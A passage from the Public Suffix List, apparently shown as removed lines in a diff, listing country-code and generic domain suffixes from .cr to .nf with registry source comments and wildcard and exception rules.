http://www.nic.cr/niccr_publico/showRegistroDominiosScreen.do -cr -ac.cr -co.cr -ed.cr -fi.cr -go.cr -or.cr -sa.cr - -// cu : http://en.wikipedia.org/wiki/.cu -cu -com.cu -edu.cu -org.cu -net.cu -gov.cu -inf.cu - -// cv : http://en.wikipedia.org/wiki/.cv -cv - -// cx : http://en.wikipedia.org/wiki/.cx -// list of other 2nd level tlds ? -cx -gov.cx - -// cy : http://en.wikipedia.org/wiki/.cy -*.cy - -// cz : http://en.wikipedia.org/wiki/.cz -cz - -// de : http://en.wikipedia.org/wiki/.de -// Confirmed by registry (with technical -// reservations) 2008-07-01 -de - -// dj : http://en.wikipedia.org/wiki/.dj -dj - -// dk : http://en.wikipedia.org/wiki/.dk -// Confirmed by registry 2008-06-17 -dk - -// dm : http://en.wikipedia.org/wiki/.dm -dm -com.dm -net.dm -org.dm -edu.dm -gov.dm - -// do : http://en.wikipedia.org/wiki/.do -do -art.do -com.do -edu.do -gob.do -gov.do -mil.do -net.do -org.do -sld.do -web.do - -// dz : http://en.wikipedia.org/wiki/.dz -dz -com.dz -org.dz -net.dz -gov.dz -edu.dz -asso.dz -pol.dz -art.dz - -// ec : http://www.nic.ec/reg/paso1.asp -// Submitted by registry 2008-07-04 -ec -com.ec -info.ec -net.ec -fin.ec -k12.ec -med.ec -pro.ec -org.ec -edu.ec -gov.ec -gob.ec -mil.ec - -// edu : http://en.wikipedia.org/wiki/.edu -edu - -// ee : http://www.eenet.ee/EENet/dom_reeglid.html#lisa_B -ee -edu.ee -gov.ee -riik.ee -lib.ee -med.ee -com.ee -pri.ee -aip.ee -org.ee -fie.ee - -// eg : http://en.wikipedia.org/wiki/.eg -eg -com.eg -edu.eg -eun.eg -gov.eg -mil.eg -name.eg -net.eg -org.eg -sci.eg - -// er : http://en.wikipedia.org/wiki/.er -*.er - -// es : https://www.nic.es/site_ingles/ingles/dominios/index.html -es -com.es -nom.es -org.es -gob.es -edu.es - -// et : http://en.wikipedia.org/wiki/.et -*.et - -// eu : http://en.wikipedia.org/wiki/.eu -eu - -// fi : http://en.wikipedia.org/wiki/.fi -fi -// aland.fi : http://en.wikipedia.org/wiki/.ax -// This domain is being phased out in favor of .ax. As there are still many -// domains under aland.fi, we still keep it on the list until aland.fi is -// completely removed. -// TODO: Check for updates (expected to be phased out around Q1/2009) -aland.fi -// iki.fi : Submitted by Hannu Aronsson 2009-11-05 -iki.fi - -// fj : http://en.wikipedia.org/wiki/.fj -*.fj - -// fk : http://en.wikipedia.org/wiki/.fk -*.fk - -// fm : http://en.wikipedia.org/wiki/.fm -fm - -// fo : http://en.wikipedia.org/wiki/.fo -fo - -// fr : http://www.afnic.fr/ -// domaines descriptifs : http://www.afnic.fr/obtenir/chartes/nommage-fr/annexe-descriptifs -fr -com.fr -asso.fr -nom.fr -prd.fr -presse.fr -tm.fr -// domaines sectoriels : http://www.afnic.fr/obtenir/chartes/nommage-fr/annexe-sectoriels -aeroport.fr -assedic.fr -avocat.fr -avoues.fr -cci.fr -chambagri.fr -chirurgiens-dentistes.fr -experts-comptables.fr -geometre-expert.fr -gouv.fr -greta.fr -huissier-justice.fr -medecin.fr -notaires.fr -pharmacien.fr -port.fr -veterinaire.fr - -// ga : http://en.wikipedia.org/wiki/.ga -ga - -// gb : This registry is effectively dormant -// Submitted by registry 2008-06-12 - -// gd : http://en.wikipedia.org/wiki/.gd -gd - -// ge : http://www.nic.net.ge/policy_en.pdf -ge -com.ge -edu.ge -gov.ge -org.ge -mil.ge -net.ge -pvt.ge - -// gf : http://en.wikipedia.org/wiki/.gf -gf - -// gg : http://www.channelisles.net/applic/avextn.shtml -gg -co.gg -org.gg -net.gg -sch.gg -gov.gg - -// gh : http://en.wikipedia.org/wiki/.gh -// see also: http://www.nic.gh/reg_now.php -// Although domains directly at second level are not possible at the moment, -// they have been possible for some time and may come back. -gh -com.gh -edu.gh -gov.gh -org.gh -mil.gh - -// gi : http://www.nic.gi/rules.html -gi -com.gi -ltd.gi -gov.gi -mod.gi -edu.gi -org.gi - -// gl : http://en.wikipedia.org/wiki/.gl -// http://nic.gl -gl - -// gm : http://www.nic.gm/htmlpages%5Cgm-policy.htm -gm - -// gn : http://psg.com/dns/gn/gn.txt -// Submitted by registry 2008-06-17 -ac.gn -com.gn -edu.gn -gov.gn -org.gn -net.gn - -// gov : http://en.wikipedia.org/wiki/.gov -gov - -// gp : http://www.nic.gp/index.php?lang=en -gp -com.gp -net.gp -mobi.gp -edu.gp -org.gp -asso.gp - -// gq : http://en.wikipedia.org/wiki/.gq -gq - -// gr : https://grweb.ics.forth.gr/english/1617-B-2005.html -// Submitted by registry 2008-06-09 -gr -com.gr -edu.gr -net.gr -org.gr -gov.gr - -// gs : http://en.wikipedia.org/wiki/.gs -gs - -// gt : http://www.gt/politicas.html -*.gt - -// gu : http://gadao.gov.gu/registration.txt -*.gu - -// gw : http://en.wikipedia.org/wiki/.gw -gw - -// gy : http://en.wikipedia.org/wiki/.gy -// http://registry.gy/ -gy -co.gy -com.gy -net.gy - -// hk : https://www.hkdnr.hk -// Submitted by registry 2008-06-11 -hk -com.hk -edu.hk -gov.hk -idv.hk -net.hk -org.hk -公司.hk -教育.hk -敎育.hk -政府.hk -個人.hk -个人.hk -箇人.hk -網络.hk -网络.hk -组織.hk -網絡.hk -网絡.hk -组织.hk -組織.hk -組织.hk - -// hm : http://en.wikipedia.org/wiki/.hm -hm - -// hn : http://www.nic.hn/politicas/ps02,,05.html -hn -com.hn -edu.hn -org.hn -net.hn -mil.hn -gob.hn - -// hr : http://www.dns.hr/documents/pdf/HRTLD-regulations.pdf -hr -iz.hr -from.hr -name.hr -com.hr - -// ht : http://www.nic.ht/info/charte.cfm -ht -com.ht -shop.ht -firm.ht -info.ht -adult.ht -net.ht -pro.ht -org.ht -med.ht -art.ht -coop.ht -pol.ht -asso.ht -edu.ht -rel.ht -gouv.ht -perso.ht - -// hu : http://www.domain.hu/domain/English/sld.html -// Confirmed by registry 2008-06-12 -hu -co.hu -info.hu -org.hu -priv.hu -sport.hu -tm.hu -2000.hu -agrar.hu -bolt.hu -casino.hu -city.hu -erotica.hu -erotika.hu -film.hu -forum.hu -games.hu -hotel.hu -ingatlan.hu -jogasz.hu -konyvelo.hu -lakas.hu -media.hu -news.hu -reklam.hu -sex.hu -shop.hu -suli.hu -szex.hu -tozsde.hu -utazas.hu -video.hu - -// id : http://en.wikipedia.org/wiki/.id -// see also: https://register.pandi.or.id/ -id -ac.id -co.id -go.id -mil.id -net.id -or.id -sch.id -web.id - -// ie : http://en.wikipedia.org/wiki/.ie -ie -gov.ie - -// il : http://en.wikipedia.org/wiki/.il -*.il - -// im : https://www.nic.im/pdfs/imfaqs.pdf -im -co.im -ltd.co.im -plc.co.im -net.im -gov.im -org.im -nic.im -ac.im - -// in : http://en.wikipedia.org/wiki/.in -// see also: http://www.inregistry.in/policies/ -// Please note, that nic.in is not an offical eTLD, but used by most -// government institutions. -in -co.in -firm.in -net.in -org.in -gen.in -ind.in -nic.in -ac.in -edu.in -res.in -gov.in -mil.in - -// info : http://en.wikipedia.org/wiki/.info -info - -// int : http://en.wikipedia.org/wiki/.int -// Confirmed by registry 2008-06-18 -int -eu.int - -// io : http://www.nic.io/rules.html -// list of other 2nd level tlds ? -io -com.io - -// iq : http://www.cmc.iq/english/iq/iqregister1.htm -iq -gov.iq -edu.iq -mil.iq -com.iq -org.iq -net.iq - -// ir : http://www.nic.ir/Terms_and_Conditions_ir,_Appendix_1_Domain_Rules -// Also see http://www.nic.ir/Internationalized_Domain_Names -// Two .ir entries added at request of , 2010-04-16 -ir -ac.ir -co.ir -gov.ir -id.ir -net.ir -org.ir -sch.ir -// xn--mgba3a4f16a.ir (.ir, Persian YEH) -ایران.ir -// xn--mgba3a4fra.ir (.ir, Arabic YEH) -ايران.ir - -// is : http://www.isnic.is/domain/rules.php -// Confirmed by registry 2008-12-06 -is -net.is -com.is -edu.is -gov.is -org.is -int.is - -// it : http://en.wikipedia.org/wiki/.it -it -gov.it -edu.it -// list of reserved geo-names : -// http://www.nic.it/documenti/regolamenti-e-linee-guida/regolamento-assegnazione-versione-6.0.pdf -// (There is also a list of reserved geo-names corresponding to Italian -// municipalities : http://www.nic.it/documenti/appendice-c.pdf , but it is -// not included here.) -agrigento.it -ag.it -alessandria.it -al.it -ancona.it -an.it -aosta.it -aoste.it -ao.it -arezzo.it -ar.it -ascoli-piceno.it -ascolipiceno.it -ap.it -asti.it -at.it -avellino.it -av.it -bari.it -ba.it -andria-barletta-trani.it -andriabarlettatrani.it -trani-barletta-andria.it -tranibarlettaandria.it -barletta-trani-andria.it -barlettatraniandria.it -andria-trani-barletta.it -andriatranibarletta.it -trani-andria-barletta.it -traniandriabarletta.it -bt.it -belluno.it -bl.it -benevento.it -bn.it -bergamo.it -bg.it -biella.it -bi.it -bologna.it -bo.it -bolzano.it -bozen.it -balsan.it -alto-adige.it -altoadige.it -suedtirol.it -bz.it -brescia.it -bs.it -brindisi.it -br.it -cagliari.it -ca.it -caltanissetta.it -cl.it -campobasso.it -cb.it -carboniaiglesias.it -carbonia-iglesias.it -iglesias-carbonia.it -iglesiascarbonia.it -ci.it -caserta.it -ce.it -catania.it -ct.it -catanzaro.it -cz.it -chieti.it -ch.it -como.it -co.it -cosenza.it -cs.it -cremona.it -cr.it -crotone.it -kr.it -cuneo.it -cn.it -dell-ogliastra.it -dellogliastra.it -ogliastra.it -og.it -enna.it -en.it -ferrara.it -fe.it -fermo.it -fm.it -firenze.it -florence.it -fi.it -foggia.it -fg.it -forli-cesena.it -forlicesena.it -cesena-forli.it -cesenaforli.it -fc.it -frosinone.it -fr.it -genova.it -genoa.it -ge.it -gorizia.it -go.it -grosseto.it -gr.it -imperia.it -im.it -isernia.it -is.it -laquila.it -aquila.it -aq.it -la-spezia.it -laspezia.it -sp.it -latina.it -lt.it -lecce.it -le.it -lecco.it -lc.it -livorno.it -li.it -lodi.it -lo.it -lucca.it -lu.it -macerata.it -mc.it -mantova.it -mn.it -massa-carrara.it -massacarrara.it -carrara-massa.it -carraramassa.it -ms.it -matera.it -mt.it -medio-campidano.it -mediocampidano.it -campidano-medio.it -campidanomedio.it -vs.it -messina.it -me.it -milano.it -milan.it -mi.it -modena.it -mo.it -monza.it -monza-brianza.it -monzabrianza.it -monzaebrianza.it -monzaedellabrianza.it -monza-e-della-brianza.it -mb.it -napoli.it -naples.it -na.it -novara.it -no.it -nuoro.it -nu.it -oristano.it -or.it -padova.it -padua.it -pd.it -palermo.it -pa.it -parma.it -pr.it -pavia.it -pv.it -perugia.it -pg.it -pescara.it -pe.it -pesaro-urbino.it -pesarourbino.it -urbino-pesaro.it -urbinopesaro.it -pu.it -piacenza.it -pc.it -pisa.it -pi.it -pistoia.it -pt.it -pordenone.it -pn.it -potenza.it -pz.it -prato.it -po.it -ragusa.it -rg.it -ravenna.it -ra.it -reggio-calabria.it -reggiocalabria.it -rc.it -reggio-emilia.it -reggioemilia.it -re.it -rieti.it -ri.it -rimini.it -rn.it -roma.it -rome.it -rm.it -rovigo.it -ro.it -salerno.it -sa.it -sassari.it -ss.it -savona.it -sv.it -siena.it -si.it -siracusa.it -sr.it -sondrio.it -so.it -taranto.it -ta.it -tempio-olbia.it -tempioolbia.it -olbia-tempio.it -olbiatempio.it -ot.it -teramo.it -te.it -terni.it -tr.it -torino.it -turin.it -to.it -trapani.it -tp.it -trento.it -trentino.it -tn.it -treviso.it -tv.it -trieste.it -ts.it -udine.it -ud.it -varese.it -va.it -venezia.it -venice.it -ve.it -verbania.it -vb.it -vercelli.it -vc.it -verona.it -vr.it -vibo-valentia.it -vibovalentia.it -vv.it -vicenza.it -vi.it -viterbo.it -vt.it - -// je : http://www.channelisles.net/applic/avextn.shtml -je -co.je -org.je -net.je -sch.je -gov.je - -// jm : http://www.com.jm/register.html -*.jm - -// jo : http://www.dns.jo/Registration_policy.aspx -jo -com.jo -org.jo -net.jo -edu.jo -sch.jo -gov.jo -mil.jo -name.jo - -// jobs : http://en.wikipedia.org/wiki/.jobs -jobs - -// jp : http://en.wikipedia.org/wiki/.jp -// http://jprs.co.jp/en/jpdomain.html -// Submitted by registry 2008-06-11 -// Updated by registry 2008-12-04 -jp -// jp organizational type names -ac.jp -ad.jp -co.jp -ed.jp -go.jp -gr.jp -lg.jp -ne.jp -or.jp -// jp geographic type names -// http://jprs.jp/doc/rule/saisoku-1.html -*.aichi.jp -*.akita.jp -*.aomori.jp -*.chiba.jp -*.ehime.jp -*.fukui.jp -*.fukuoka.jp -*.fukushima.jp -*.gifu.jp -*.gunma.jp -*.hiroshima.jp -*.hokkaido.jp -*.hyogo.jp -*.ibaraki.jp -*.ishikawa.jp -*.iwate.jp -*.kagawa.jp -*.kagoshima.jp -*.kanagawa.jp -*.kawasaki.jp -*.kitakyushu.jp -*.kobe.jp -*.kochi.jp -*.kumamoto.jp -*.kyoto.jp -*.mie.jp -*.miyagi.jp -*.miyazaki.jp -*.nagano.jp -*.nagasaki.jp -*.nagoya.jp -*.nara.jp -*.niigata.jp -*.oita.jp -*.okayama.jp -*.okinawa.jp -*.osaka.jp -*.saga.jp -*.saitama.jp -*.sapporo.jp -*.sendai.jp -*.shiga.jp -*.shimane.jp -*.shizuoka.jp -*.tochigi.jp -*.tokushima.jp -*.tokyo.jp -*.tottori.jp -*.toyama.jp -*.wakayama.jp -*.yamagata.jp -*.yamaguchi.jp -*.yamanashi.jp -*.yokohama.jp -!metro.tokyo.jp -!pref.aichi.jp -!pref.akita.jp -!pref.aomori.jp -!pref.chiba.jp -!pref.ehime.jp -!pref.fukui.jp -!pref.fukuoka.jp -!pref.fukushima.jp -!pref.gifu.jp -!pref.gunma.jp -!pref.hiroshima.jp -!pref.hokkaido.jp -!pref.hyogo.jp -!pref.ibaraki.jp -!pref.ishikawa.jp -!pref.iwate.jp -!pref.kagawa.jp -!pref.kagoshima.jp -!pref.kanagawa.jp -!pref.kochi.jp -!pref.kumamoto.jp -!pref.kyoto.jp -!pref.mie.jp -!pref.miyagi.jp -!pref.miyazaki.jp -!pref.nagano.jp -!pref.nagasaki.jp -!pref.nara.jp -!pref.niigata.jp -!pref.oita.jp -!pref.okayama.jp -!pref.okinawa.jp -!pref.osaka.jp -!pref.saga.jp -!pref.saitama.jp -!pref.shiga.jp -!pref.shimane.jp -!pref.shizuoka.jp -!pref.tochigi.jp -!pref.tokushima.jp -!pref.tottori.jp -!pref.toyama.jp -!pref.wakayama.jp -!pref.yamagata.jp -!pref.yamaguchi.jp -!pref.yamanashi.jp -!city.chiba.jp -!city.fukuoka.jp -!city.hiroshima.jp -!city.kawasaki.jp -!city.kitakyushu.jp -!city.kobe.jp -!city.kyoto.jp -!city.nagoya.jp -!city.niigata.jp -!city.okayama.jp -!city.osaka.jp -!city.saitama.jp -!city.sapporo.jp -!city.sendai.jp -!city.shizuoka.jp -!city.yokohama.jp - -// ke : http://www.kenic.or.ke/index.php?option=com_content&task=view&id=117&Itemid=145 -*.ke - -// kg : http://www.domain.kg/dmn_n.html -kg -org.kg -net.kg -com.kg -edu.kg -gov.kg -mil.kg - -// kh : http://www.mptc.gov.kh/dns_registration.htm -*.kh - -// ki : http://www.ki/dns/index.html -ki -edu.ki -biz.ki -net.ki -org.ki -gov.ki -info.ki -com.ki - -// km : http://en.wikipedia.org/wiki/.km -// http://www.domaine.km/documents/charte.doc -km -org.km -nom.km -gov.km -prd.km -tm.km -edu.km -mil.km -ass.km -com.km -// These are only mentioned as proposed suggestions at domaine.km, but -// http://en.wikipedia.org/wiki/.km says they're available for registration: -coop.km -asso.km -presse.km -medecin.km -notaires.km -pharmaciens.km -veterinaire.km -gouv.km - -// kn : http://en.wikipedia.org/wiki/.kn -// http://www.dot.kn/domainRules.html -kn -net.kn -org.kn -edu.kn -gov.kn - -// kp : http://www.kcce.kp/en_index.php -com.kp -edu.kp -gov.kp -org.kp -rep.kp -tra.kp - -// kr : http://en.wikipedia.org/wiki/.kr -// see also: http://domain.nida.or.kr/eng/registration.jsp -kr -ac.kr -co.kr -es.kr -go.kr -hs.kr -kg.kr -mil.kr -ms.kr -ne.kr -or.kr -pe.kr -re.kr -sc.kr -// kr geographical names -busan.kr -chungbuk.kr -chungnam.kr -daegu.kr -daejeon.kr -gangwon.kr -gwangju.kr -gyeongbuk.kr -gyeonggi.kr -gyeongnam.kr -incheon.kr -jeju.kr -jeonbuk.kr -jeonnam.kr -seoul.kr -ulsan.kr - -// kw : http://en.wikipedia.org/wiki/.kw -*.kw - -// ky : http://www.icta.ky/da_ky_reg_dom.php -// Confirmed by registry 2008-06-17 -ky -edu.ky -gov.ky -com.ky -org.ky -net.ky - -// kz : http://en.wikipedia.org/wiki/.kz -// see also: http://www.nic.kz/rules/index.jsp -kz -org.kz -edu.kz -net.kz -gov.kz -mil.kz -com.kz - -// la : http://en.wikipedia.org/wiki/.la -// Submitted by registry 2008-06-10 -la -int.la -net.la -info.la -edu.la -gov.la -per.la -com.la -org.la -// see http://www.c.la/ -c.la - -// lb : http://en.wikipedia.org/wiki/.lb -// Submitted by registry 2008-06-17 -com.lb -edu.lb -gov.lb -net.lb -org.lb - -// lc : http://en.wikipedia.org/wiki/.lc -// see also: http://www.nic.lc/rules.htm -lc -com.lc -net.lc -co.lc -org.lc -edu.lc -gov.lc - -// li : http://en.wikipedia.org/wiki/.li -li - -// lk : http://www.nic.lk/seclevpr.html -lk -gov.lk -sch.lk -net.lk -int.lk -com.lk -org.lk -edu.lk -ngo.lk -soc.lk -web.lk -ltd.lk -assn.lk -grp.lk -hotel.lk - -// local : http://en.wikipedia.org/wiki/.local -local - -// lr : http://psg.com/dns/lr/lr.txt -// Submitted by registry 2008-06-17 -com.lr -edu.lr -gov.lr -org.lr -net.lr - -// ls : http://en.wikipedia.org/wiki/.ls -ls -co.ls -org.ls - -// lt : http://en.wikipedia.org/wiki/.lt -lt -// gov.lt : http://www.gov.lt/index_en.php -gov.lt - -// lu : http://www.dns.lu/en/ -lu - -// lv : http://www.nic.lv/DNS/En/generic.php -lv -com.lv -edu.lv -gov.lv -org.lv -mil.lv -id.lv -net.lv -asn.lv -conf.lv - -// ly : http://www.nic.ly/regulations.php -ly -com.ly -net.ly -gov.ly -plc.ly -edu.ly -sch.ly -med.ly -org.ly -id.ly - -// ma : http://en.wikipedia.org/wiki/.ma -// http://www.anrt.ma/fr/admin/download/upload/file_fr782.pdf -ma -co.ma -net.ma -gov.ma -org.ma -ac.ma -press.ma - -// mc : http://www.nic.mc/ -mc -tm.mc -asso.mc - -// md : http://en.wikipedia.org/wiki/.md -md - -// me : http://en.wikipedia.org/wiki/.me -me -co.me -net.me -org.me -edu.me -ac.me -gov.me -its.me -priv.me - -// mg : http://www.nic.mg/tarif.htm -mg -org.mg -nom.mg -gov.mg -prd.mg -tm.mg -edu.mg -mil.mg -com.mg - -// mh : http://en.wikipedia.org/wiki/.mh -mh - -// mil : http://en.wikipedia.org/wiki/.mil -mil - -// mk : http://en.wikipedia.org/wiki/.mk -// see also: http://dns.marnet.net.mk/postapka.php -mk -com.mk -org.mk -net.mk -edu.mk -gov.mk -inf.mk -name.mk - -// ml : http://www.gobin.info/domainname/ml-template.doc -// see also: http://en.wikipedia.org/wiki/.ml -ml -com.ml -edu.ml -gouv.ml -gov.ml -net.ml -org.ml -presse.ml - -// mm : http://en.wikipedia.org/wiki/.mm -*.mm - -// mn : http://en.wikipedia.org/wiki/.mn -mn -gov.mn -edu.mn -org.mn - -// mo : http://www.monic.net.mo/ -mo -com.mo -net.mo -org.mo -edu.mo -gov.mo - -// mobi : http://en.wikipedia.org/wiki/.mobi -mobi - -// mp : http://www.dot.mp/ -// Confirmed by registry 2008-06-17 -mp - -// mq : http://en.wikipedia.org/wiki/.mq -mq - -// mr : http://en.wikipedia.org/wiki/.mr -mr -gov.mr - -// ms : http://en.wikipedia.org/wiki/.ms -ms - -// mt : https://www.nic.org.mt/dotmt/ -*.mt - -// mu : http://en.wikipedia.org/wiki/.mu -mu -com.mu -net.mu -org.mu -gov.mu -ac.mu -co.mu -or.mu - -// museum : http://about.museum/naming/ -// http://index.museum/ -museum -academy.museum -agriculture.museum -air.museum -airguard.museum -alabama.museum -alaska.museum -amber.museum -ambulance.museum -american.museum -americana.museum -americanantiques.museum -americanart.museum -amsterdam.museum -and.museum -annefrank.museum -anthro.museum -anthropology.museum -antiques.museum -aquarium.museum -arboretum.museum -archaeological.museum -archaeology.museum -architecture.museum -art.museum -artanddesign.museum -artcenter.museum -artdeco.museum -arteducation.museum -artgallery.museum -arts.museum -artsandcrafts.museum -asmatart.museum -assassination.museum -assisi.museum -association.museum -astronomy.museum -atlanta.museum -austin.museum -australia.museum -automotive.museum -aviation.museum -axis.museum -badajoz.museum -baghdad.museum -bahn.museum -bale.museum -baltimore.museum -barcelona.museum -baseball.museum -basel.museum -baths.museum -bauern.museum -beauxarts.museum -beeldengeluid.museum -bellevue.museum -bergbau.museum -berkeley.museum -berlin.museum -bern.museum -bible.museum -bilbao.museum -bill.museum -birdart.museum -birthplace.museum -bonn.museum -boston.museum -botanical.museum -botanicalgarden.museum -botanicgarden.museum -botany.museum -brandywinevalley.museum -brasil.museum -bristol.museum -british.museum -britishcolumbia.museum -broadcast.museum -brunel.museum -brussel.museum -brussels.museum -bruxelles.museum -building.museum -burghof.museum -bus.museum -bushey.museum -cadaques.museum -california.museum -cambridge.museum -can.museum -canada.museum -capebreton.museum -carrier.museum -cartoonart.museum -casadelamoneda.museum -castle.museum -castres.museum -celtic.museum -center.museum -chattanooga.museum -cheltenham.museum -chesapeakebay.museum -chicago.museum -children.museum -childrens.museum -childrensgarden.museum -chiropractic.museum -chocolate.museum -christiansburg.museum -cincinnati.museum -cinema.museum -circus.museum -civilisation.museum -civilization.museum -civilwar.museum -clinton.museum -clock.museum -coal.museum -coastaldefence.museum -cody.museum -coldwar.museum -collection.museum -colonialwilliamsburg.museum -coloradoplateau.museum -columbia.museum -columbus.museum -communication.museum -communications.museum -community.museum -computer.museum -computerhistory.museum -comunicações.museum -contemporary.museum -contemporaryart.museum -convent.museum -copenhagen.museum -corporation.museum -correios-e-telecomunicações.museum -corvette.museum -costume.museum -countryestate.museum -county.museum -crafts.museum -cranbrook.museum -creation.museum -cultural.museum -culturalcenter.museum -culture.museum -cyber.museum -cymru.museum -dali.museum -dallas.museum -database.museum -ddr.museum -decorativearts.museum -delaware.museum -delmenhorst.museum -denmark.museum -depot.museum -design.museum -detroit.museum -dinosaur.museum -discovery.museum -dolls.museum -donostia.museum -durham.museum -eastafrica.museum -eastcoast.museum -education.museum -educational.museum -egyptian.museum -eisenbahn.museum -elburg.museum -elvendrell.museum -embroidery.museum -encyclopedic.museum -england.museum -entomology.museum -environment.museum -environmentalconservation.museum -epilepsy.museum -essex.museum -estate.museum -ethnology.museum -exeter.museum -exhibition.museum -family.museum -farm.museum -farmequipment.museum -farmers.museum -farmstead.museum -field.museum -figueres.museum -filatelia.museum -film.museum -fineart.museum -finearts.museum -finland.museum -flanders.museum -florida.museum -force.museum -fortmissoula.museum -fortworth.museum -foundation.museum -francaise.museum -frankfurt.museum -franziskaner.museum -freemasonry.museum -freiburg.museum -fribourg.museum -frog.museum -fundacio.museum -furniture.museum -gallery.museum -garden.museum -gateway.museum -geelvinck.museum -gemological.museum -geology.museum -georgia.museum -giessen.museum -glas.museum -glass.museum -gorge.museum -grandrapids.museum -graz.museum -guernsey.museum -halloffame.museum -hamburg.museum -handson.museum -harvestcelebration.museum -hawaii.museum -health.museum -heimatunduhren.museum -hellas.museum -helsinki.museum -hembygdsforbund.museum -heritage.museum -histoire.museum -historical.museum -historicalsociety.museum -historichouses.museum -historisch.museum -historisches.museum -history.museum -historyofscience.museum -horology.museum -house.museum -humanities.museum -illustration.museum -imageandsound.museum -indian.museum -indiana.museum -indianapolis.museum -indianmarket.museum -intelligence.museum -interactive.museum -iraq.museum -iron.museum -isleofman.museum -jamison.museum -jefferson.museum -jerusalem.museum -jewelry.museum -jewish.museum -jewishart.museum -jfk.museum -journalism.museum -judaica.museum -judygarland.museum -juedisches.museum -juif.museum -karate.museum -karikatur.museum -kids.museum -koebenhavn.museum -koeln.museum -kunst.museum -kunstsammlung.museum -kunstunddesign.museum -labor.museum -labour.museum -lajolla.museum -lancashire.museum -landes.museum -lans.museum -läns.museum -larsson.museum -lewismiller.museum -lincoln.museum -linz.museum -living.museum -livinghistory.museum -localhistory.museum -london.museum -losangeles.museum -louvre.museum -loyalist.museum -lucerne.museum -luxembourg.museum -luzern.museum -mad.museum -madrid.museum -mallorca.museum -manchester.museum -mansion.museum -mansions.museum -manx.museum -marburg.museum -maritime.museum -maritimo.museum -maryland.museum -marylhurst.museum -media.museum -medical.museum -medizinhistorisches.museum -meeres.museum -memorial.museum -mesaverde.museum -michigan.museum -midatlantic.museum -military.museum -mill.museum -miners.museum -mining.museum -minnesota.museum -missile.museum -missoula.museum -modern.museum -moma.museum -money.museum -monmouth.museum -monticello.museum -montreal.museum -moscow.museum -motorcycle.museum -muenchen.museum -muenster.museum -mulhouse.museum -muncie.museum -museet.museum -museumcenter.museum -museumvereniging.museum -music.museum -national.museum -nationalfirearms.museum -nationalheritage.museum -nativeamerican.museum -naturalhistory.museum -naturalhistorymuseum.museum -naturalsciences.museum -nature.museum -naturhistorisches.museum -natuurwetenschappen.museum -naumburg.museum -naval.museum -nebraska.museum -neues.museum -newhampshire.museum -newjersey.museum -newmexico.museum -newport.museum -newspaper.museum -newyork.museum -niepce.museum -norfolk.museum -north.museum -nrw.museum -nuernberg.museum -nuremberg.museum -nyc.museum -nyny.museum -oceanographic.museum -oceanographique.museum -omaha.museum -online.museum -ontario.museum -openair.museum -oregon.museum -oregontrail.museum -otago.museum -oxford.museum -pacific.museum -paderborn.museum -palace.museum -paleo.museum -palmsprings.museum -panama.museum -paris.museum -pasadena.museum -pharmacy.museum -philadelphia.museum -philadelphiaarea.museum -philately.museum -phoenix.museum -photography.museum -pilots.museum -pittsburgh.museum -planetarium.museum -plantation.museum -plants.museum -plaza.museum -portal.museum -portland.museum -portlligat.museum -posts-and-telecommunications.museum -preservation.museum -presidio.museum -press.museum -project.museum -public.museum -pubol.museum -quebec.museum -railroad.museum -railway.museum -research.museum -resistance.museum -riodejaneiro.museum -rochester.museum -rockart.museum -roma.museum -russia.museum -saintlouis.museum -salem.museum -salvadordali.museum -salzburg.museum -sandiego.museum -sanfrancisco.museum -santabarbara.museum -santacruz.museum -santafe.museum -saskatchewan.museum -satx.museum -savannahga.museum -schlesisches.museum -schoenbrunn.museum -schokoladen.museum -school.museum -schweiz.museum -science.museum -scienceandhistory.museum -scienceandindustry.museum -sciencecenter.museum -sciencecenters.museum -science-fiction.museum -sciencehistory.museum -sciences.museum -sciencesnaturelles.museum -scotland.museum -seaport.museum -settlement.museum -settlers.museum -shell.museum -sherbrooke.museum -sibenik.museum -silk.museum -ski.museum -skole.museum -society.museum -sologne.museum -soundandvision.museum -southcarolina.museum -southwest.museum -space.museum -spy.museum -square.museum -stadt.museum -stalbans.museum -starnberg.museum -state.museum -stateofdelaware.museum -station.museum -steam.museum -steiermark.museum -stjohn.museum -stockholm.museum -stpetersburg.museum -stuttgart.museum -suisse.museum -surgeonshall.museum -surrey.museum -svizzera.museum -sweden.museum -sydney.museum -tank.museum -tcm.museum -technology.museum -telekommunikation.museum -television.museum -texas.museum -textile.museum -theater.museum -time.museum -timekeeping.museum -topology.museum -torino.museum -touch.museum -town.museum -transport.museum -tree.museum -trolley.museum -trust.museum -trustee.museum -uhren.museum -ulm.museum -undersea.museum -university.museum -usa.museum -usantiques.museum -usarts.museum -uscountryestate.museum -usculture.museum -usdecorativearts.museum -usgarden.museum -ushistory.museum -ushuaia.museum -uslivinghistory.museum -utah.museum -uvic.museum -valley.museum -vantaa.museum -versailles.museum -viking.museum -village.museum -virginia.museum -virtual.museum -virtuel.museum -vlaanderen.museum -volkenkunde.museum -wales.museum -wallonie.museum -war.museum -washingtondc.museum -watchandclock.museum -watch-and-clock.museum -western.museum -westfalen.museum -whaling.museum -wildlife.museum -williamsburg.museum -windmill.museum -workshop.museum -york.museum -yorkshire.museum -yosemite.museum -youth.museum -zoological.museum -zoology.museum -ירושלים.museum -иком.museum - -// mv : http://en.wikipedia.org/wiki/.mv -// "mv" included because, contra Wikipedia, google.mv exists. -mv -aero.mv -biz.mv -com.mv -coop.mv -edu.mv -gov.mv -info.mv -int.mv -mil.mv -museum.mv -name.mv -net.mv -org.mv -pro.mv - -// mw : http://www.registrar.mw/ -mw -ac.mw -biz.mw -co.mw -com.mw -coop.mw -edu.mw -gov.mw -int.mw -museum.mw -net.mw -org.mw - -// mx : http://www.nic.mx/ -// Submitted by registry 2008-06-19 -mx -com.mx -org.mx -gob.mx -edu.mx -net.mx - -// my : http://www.mynic.net.my/ -my -com.my -net.my -org.my -gov.my -edu.my -mil.my -name.my - -// mz : http://www.gobin.info/domainname/mz-template.doc -*.mz - -// na : http://www.na-nic.com.na/ -// http://www.info.na/domain/ -na -info.na -pro.na -name.na -school.na -or.na -dr.na -us.na -mx.na -ca.na -in.na -cc.na -tv.na -ws.na -mobi.na -co.na -com.na -org.na - -// name : has 2nd-level tlds, but there's no list of them -name - -// nc : http://www.cctld.nc/ -nc -asso.nc - -// ne : http://en.wikipedia.org/wiki/.ne -ne - -// net : http://en.wikipedia.org/wiki/.net -net - -// CentralNic names : http://www.centralnic.com/names/domains -// Submitted by registry 2008-06-17 -gb.net -se.net -uk.net - -// ZaNiC names : http://www.za.net/ -// Confirmed by registry 2009-10-03 -za.net - -// nf : http://en.wikipedia.org/wiki/.nf -nf -com.nf -net.nf -per.nf -rec.nf -web.nf -arts.nf -firm.nf -info.nf -other.nf 